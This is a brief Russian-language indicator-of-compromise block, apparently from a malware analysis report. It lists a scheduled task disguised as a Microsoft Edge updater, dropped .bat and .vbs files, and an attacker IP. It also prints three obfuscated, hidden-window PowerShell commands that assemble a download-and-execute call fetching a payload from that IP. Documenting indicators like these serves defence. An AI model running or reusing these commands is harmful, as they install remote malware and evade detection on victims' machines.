Техническая информация
- <SYSTEM32>\tasks\micros oftedgeupdate
- C:\users\public\ccoe.bat
- C:\users\public\ccoe.vbs
- '95.##4.27.64':222
- http://95.###.27.64:222/cod.jpg via 95.##4.27.64
- '<SYSTEM32>\cmd.exe' /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://95.214.27.64:222/cod.jpg'')'.RePLACe('VAN','AD...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://95.214.27.64:222/cod.jpg'')'.RePLACe('VAN','AD...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://95.214.27.64:222/cod.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];...